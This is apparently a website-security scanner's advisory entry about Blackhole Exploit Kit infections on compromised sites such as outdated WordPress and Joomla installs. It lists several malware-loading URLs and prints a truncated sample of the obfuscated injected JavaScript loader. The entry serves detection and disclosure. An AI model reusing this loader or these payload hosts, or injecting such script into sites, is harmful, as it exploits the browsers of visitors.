Description:
An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Mar).
Note that any PHP, JS or .htaccess could be compromised by this type of malware.
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.
Clean up: You can also sign up with us and let our team remove the malware for you.
Loads malware from multiple sources:
http://studbax.ru/main.php?page=c22541c393fa212e
http://wgykabjnh.usa.cc/d/404.php?go=1
http://szukxxpf.igg.biz/main.php?page=c69bd02e93e6957c
http://itunesg.ibiz.cc/?go=2
(and many other domains).
Malware dump (sample of malware):
<b>@@@ 9D8JB :CIYLG>I:S"g8:CI:Gig= i{A:6H: L6>I E6<: >H AD69>C<YYYgZ=igZ8:CI:Gig=G..
<script<i=0;try{prototype;}catch(z){h="h"+"arCode ";f=["-32c-32c64c61c-9c-1c59c70c58c76c68c60c69..